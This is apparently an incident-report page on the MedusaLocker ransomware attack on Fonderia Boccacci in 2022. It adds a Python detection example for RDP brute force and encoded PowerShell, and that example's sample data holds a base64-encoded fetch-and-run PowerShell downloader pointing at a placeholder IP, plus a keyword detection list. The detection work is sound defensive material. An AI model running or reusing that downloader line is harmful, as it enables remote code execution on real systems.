Cyber Incident Victim: Fonderia Boccacci
Date:
Nov 2022
Location:
Italy
Summary
The Italian company Fonderia Boccacci fell victim to a ransomware attack by the MedusaLocker gang, the group's first known compromise of an Italian organization. MedusaLocker's known initial-access methods are exposed or weakly configured Remote Desktop Protocol (RDP) services and phishing, with PowerShell scripts used after compromise to spread through the network and run the encryptor; which of these was used against Fonderia Boccacci was not disclosed. The attackers encrypted data, exfiltrated company files and published samples on their leak site to coerce payment, demanding a $10,000 cryptocurrency ransom for the decryption keys and threatening full disclosure if it went unpaid.
Description
On or around November 15, 2022, Fonderia Boccacci, an Italian company, fell victim to a ransomware attack perpetrated by the MedusaLocker criminal gang. This marked the first confirmed attack by this group against an Italian organization. The attackers infiltrated the company’s IT infrastructure, exfiltrated data, and deployed ransomware to encrypt files. MedusaLocker subsequently published samples of the stolen data on their dark web leak site (DLS) to intensify pressure on the organization. The gang demanded a ransom payment of $10,000 in cryptocurrency in exchange for decryption keys and threatened full public release of the exfiltrated data if payment was not made. The exact volume of compromised files remained unclear based on available information. Fonderia Boccacci’s public-facing website highlighted commitments to environmental sustainability and operational safety, though no direct statements regarding the incident were observed at the time of reporting.

MedusaLocker's documented tradecraft covers several vectors: initial access through exposed or weakly configured Remote Desktop Protocol (RDP) services and through phishing, followed by PowerShell scripts to move through the network and launch the encryptor. Whether the Fonderia Boccacci intrusion used these specific vectors was not disclosed. The gang's leak site showed screenshots of stolen files as proof of the breach, though the file types, and whether any sensitive records were among them, were not detailed in public reports. Nothing was disclosed about Fonderia Boccacci's internal detection, containment, or any decision on ransom negotiations. The incident carried the operational disruption of encrypted systems and the reputational risk of published data, but financial impact beyond the ransom demand was unverified. Cybersecurity monitoring platforms continued tracking the case, but no subsequent updates on payment outcomes or further data leaks were confirmed in the immediate aftermath.
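A practitioner reading the vector list above would want detection logic for the two observable pieces of that tradecraft: RDP password guessing that ends in a successful logon, and PowerShell launched with an encoded downloader command. The following Python is an added example written for this page, not code from the report, from MedusaLocker, or from Fonderia Boccacci. It runs over constructed sample events (the hosts, IPs, usernames, timestamps and thresholds are all made up) shaped like Windows Security events 4625 (failed logon), 4624 (successful logon) and 4688 (process creation).

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# --- Constructed sample telemetry (not real logs from the incident) -----------
# Minimal fields from Windows Security events 4625 (failed logon), 4624
# (successful logon) and 4688 (process creation). LogonType 10 is
# RemoteInteractive, i.e. a logon over RDP. IPs are documentation ranges.
def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

# An encoded PowerShell one-liner of the kind -EncodedCommand carries:
# PowerShell expects base64 of the UTF-16LE script text.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
    .encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    # password guessing against RDP from one external address, then a success
    {"time": _ts("2022-11-15 02:00:01"), "id": 4625, "ip": "198.51.100.23", "logon_type": 10, "user": "administrator"},
    {"time": _ts("2022-11-15 02:00:04"), "id": 4625, "ip": "198.51.100.23", "logon_type": 10, "user": "admin"},
    {"time": _ts("2022-11-15 02:00:07"), "id": 4625, "ip": "198.51.100.23", "logon_type": 10, "user": "backup"},
    {"time": _ts("2022-11-15 02:00:10"), "id": 4625, "ip": "198.51.100.23", "logon_type": 10, "user": "operator"},
    {"time": _ts("2022-11-15 02:00:13"), "id": 4625, "ip": "198.51.100.23", "logon_type": 10, "user": "it"},
    {"time": _ts("2022-11-15 02:00:20"), "id": 4624, "ip": "198.51.100.23", "logon_type": 10, "user": "it"},
    # encoded PowerShell downloader launched shortly after the RDP success
    {"time": _ts("2022-11-15 02:03:00"), "id": 4688, "host": "FILESRV01",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    # benign: one mistyped password from an internal workstation, then success
    {"time": _ts("2022-11-15 08:15:00"), "id": 4625, "ip": "10.0.5.12", "logon_type": 10, "user": "mrossi"},
    {"time": _ts("2022-11-15 08:15:09"), "id": 4624, "ip": "10.0.5.12", "logon_type": 10, "user": "mrossi"},
    # benign: a scheduled script run from a file on disk
    {"time": _ts("2022-11-15 08:20:00"), "id": 4688, "host": "WS-ACCT07",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

# --- Rule 1: RDP brute force followed by a successful RDP logon --------------
BRUTE_THRESHOLD = 5                  # assumed tuning values, adjust per estate
BRUTE_WINDOW = timedelta(minutes=5)

def detect_rdp_brute_force(events, threshold=BRUTE_THRESHOLD, window=BRUTE_WINDOW):
    """Flag a source IP whose RDP success is preceded by >= threshold RDP
    failures from the same IP inside the window. Events are processed in
    time order so a success is only matched against earlier failures."""
    failures = defaultdict(list)
    findings = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        if e.get("logon_type") != 10:
            continue
        if e["id"] == 4625:
            failures[e["ip"]].append(e["time"])
        elif e["id"] == 4624:
            recent = [t for t in failures[e["ip"]] if e["time"] - t <= window]
            if len(recent) >= threshold:
                findings.append({"rule": "rdp_bruteforce_then_success", "time": e["time"],
                                 "ip": e["ip"], "user": e["user"], "failures": len(recent)})
    return findings

# --- Rule 2: encoded / downloader PowerShell in process creation -------------
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
SUSPICIOUS = ("downloadstring", "downloadfile", "invoke-webrequest",
              "invoke-expression", "iex", "vssadmin", "-w hidden", "bypass")

def decode_encoded_command(cmdline):
    """Return the decoded script behind -enc/-EncodedCommand, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def detect_suspicious_powershell(events):
    """Flag powershell.exe launches that use an encoded command or contain
    download/evasion keywords, matched on both the raw command line and the
    decoded payload. Plain substring matching keeps the example readable."""
    findings = []
    for e in events:
        if e["id"] != 4688 or "powershell" not in e["cmdline"].lower():
            continue
        decoded = decode_encoded_command(e["cmdline"])
        haystack = (e["cmdline"] + " " + (decoded or "")).lower()
        indicators = [k for k in SUSPICIOUS if k in haystack]
        if decoded is not None:
            indicators.insert(0, "encoded_command")
        if indicators:
            findings.append({"rule": "suspicious_powershell", "time": e["time"],
                             "host": e["host"], "indicators": indicators, "decoded": decoded})
    return findings

def run_detections(events):
    return detect_rdp_brute_force(events) + detect_suspicious_powershell(events)

if __name__ == "__main__":
    for finding in run_detections(SAMPLE_EVENTS):
        print(finding)
```

Against the constructed events the first rule fires once, on 198.51.100.23 after five failures, and the second fires once, on the FILESRV01 launch, with the decoded downloader attached; the internal typo and the scripted backup produce nothing. In production the same logic would read from a SIEM or Windows event forwarding rather than a list; the threshold and window are starting points, and the RDP rule should additionally key on external source ranges, since RDP reachable from the internet is the configuration this group is known to exploit.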
